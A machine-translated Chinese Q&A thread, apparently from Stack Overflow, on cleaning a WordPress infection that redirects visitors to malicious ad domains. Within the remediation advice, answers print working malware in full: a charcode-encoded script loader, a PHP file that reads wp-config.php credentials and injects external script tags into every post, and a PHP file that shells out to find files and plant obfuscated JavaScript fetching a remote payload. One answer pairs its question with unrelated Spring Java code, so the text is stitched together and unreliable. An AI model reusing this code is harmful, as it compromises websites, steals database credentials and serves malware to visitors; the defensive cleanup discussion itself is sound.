我的wordpress网站上到处都有该脚本,我删除了许多脚本,但是仍然重定向到一些恶意软件广告。
有人知道如何解决这个问题吗?
脚本具有此链接:ads.voipnewswire.net
答案 0 :(得分:8)
今天上午,我在两个页面上遇到了相同的问题,在对我的文件和数据库进行了大量调查之后,我发现该恶意软件的行为是更改了我的js文件,添加了一个编码脚本并在每个末尾添加了另一个脚本发布到我数据库的wp_posts表上。
我基本上通过两个步骤解决了这个问题:
首先:使用PHPMyadmin或任何客户端转到您的数据库(Mysql),然后输入:
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
它的作用是删除表上所有出现的恶意软件注入。
注意:搜索的“?ver = 1.0.5”部分可能会更改,请在开始加载时在“ Ctrl + U”下检查您的页面代码,然后在重定向之前搜索“ cdn.examhome.net”或“ ads.voipnewswire.net”或“ eval(String.fromCharCode ...”),然后检查恶意软件js的版本,以便在上述数据库查询中对其进行更改。
第二:转到文件管理器,然后以zip或类似格式压缩所有文件。下载压缩文件并解压缩到您的计算机上,使用Notepad ++(sublimetext等可以提供帮助,但我建议使用Notepad ++),并使用该目录上的高级搜索将其替换为所有文档中的空白或空白:
this is an image of how the replacement looks on Notepad++ (in Spanish)
eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));
注意:里面的数字可以更改,但是它们始终以eval(String.fromCharCode()开头,不用担心,wordpress或插件的核心js都不使用它,所以您可以搜索任何匹配项并复制其中的数字以完成替换语句。
然后再次压缩,删除所有public_html内容,然后重新上传压缩文件,然后将其解压缩到public_html根目录上。
有了这一切,我的两个Wordpress页面都恢复了正常状态,希望它能为您提供帮助。祝你好运!
答案 1 :(得分:1)
我曾帮助一位朋友解决此问题,并竭力帮助社区,以解决WordPress文件中这种讨厌的恶意软件的经验,我发现该恶意软件被注入到我的案例中一个文件夹中/ wp-content / uploads /文件夹作为没有扩展名的文件。
我发现了两个文件(php文件):
第一个文件使用所有键和数据库详细信息公开“ wp-config.php”,并将examhome.net脚本注入post_content表中-代码如下。
<?php echo ":#009009#:";
$file_to_search = "wp-config.php";
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);
function search_file($dir,$file_to_search){
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {
show_sitenames($path);
}
} else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}
}
}
echo ":#009009#:";
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {
echo $conn->connect_error;
} else {
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "examhome") === false){
echo "nothing:".$file."\n";
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
$conn->query($q3);
} else {
echo "already exist:".$file."\n";
}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function get_var_reg($pat,$text) {
if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}
return "";
}
exit();
第二个文件在执行时,将下面的代码(js脚本)递归注入js文件中的“ head”部分。 该脚本还将文件的权限更改为777,表示可以读写
在此阶段,您的系统已经受到威胁,无论多少次从具有完全访问系统权限的文件中删除脚本,因为“ wp-config.php”详细信息已破坏了先前的含义,他们现在可以访问您的wp-admin。
<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))> -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';
$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
@system("chmod 777 ".$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo $f;
}
}
}
echo ":#009009#:";
重要的是,不要使用复制器插件,因为它似乎有SQL注入孔,如果在系统中确实有,请删除它。 您可以使用grep命令来识别受感染的文件,如下所示:
sudo grep -rl“ examhome.net” / var / www / html / |更多
sudo grep -r“ eval(String.fromCharCode(118,97” / var / www / html / |更多
我真的希望这可以帮助其他人解决此问题,但这不是最终解决方案,因为该恶意软件蠕虫正在更新,并且我仍在调查此问题。
戴夫
免责声明:仅使用您在此帖子中的信息负责!
答案 2 :(得分:0)
您可以采用这种方法,但要小心:
首先备份wordpress数据库,然后在任何代码编辑器(如notepad ++等)中打开该backup.sql文件,然后在其中搜索“ https://s2.voipnewswire.net/s2.js \'type = \ 'text / javascript \'>“,然后将所有出现的问题替换为空格,即可解决问题。
现在,恶意脚本已从您所有的wordpress网站内容中删除,并且您可以对其他网站文件执行同样的操作。
答案 3 :(得分:0)
最常见的问题是对wp_options表的注入,该表类似于
eval(String.fromCharCode(118, 97, 114, 32, 100,
因此,要首先找到导出数据库的数据库,请使用编辑器将其打开,然后搜索字符串“ eval(String.fromCharCode(118,97,114,32,100,”),下一步是删除带有该字符串的行从数据库中,很可能会在wp_options表中找到它
答案 4 :(得分:0)
我的wordpress缓存(wp-content / cache / page_enhanced /)不断使用其他人的不安全脚本生成主页和其他页面。
例如:
@SpringBootConfiguration
public class MySpringCloudFunctionPlanetApplication implements ApplicationContextInitializer<GenericApplicationContext> {
public static void main(String[] args) {
FunctionalSpringApplication.run(MySpringCloudFunctionPlanetApplication.class, args);
}
public Function<String, Boolean> containsCloud() {
return value -> value.contains("cloud");
}
@Override
public void initialize(GenericApplicationContext context) {
context.registerBean("containsCloud", FunctionRegistration.class,
() -> new FunctionRegistration<>(containsCloud())
.type(FunctionType.from(String.class).to(Boolean.class)));
}
}
查看页面源代码时可以注入那些文件吗?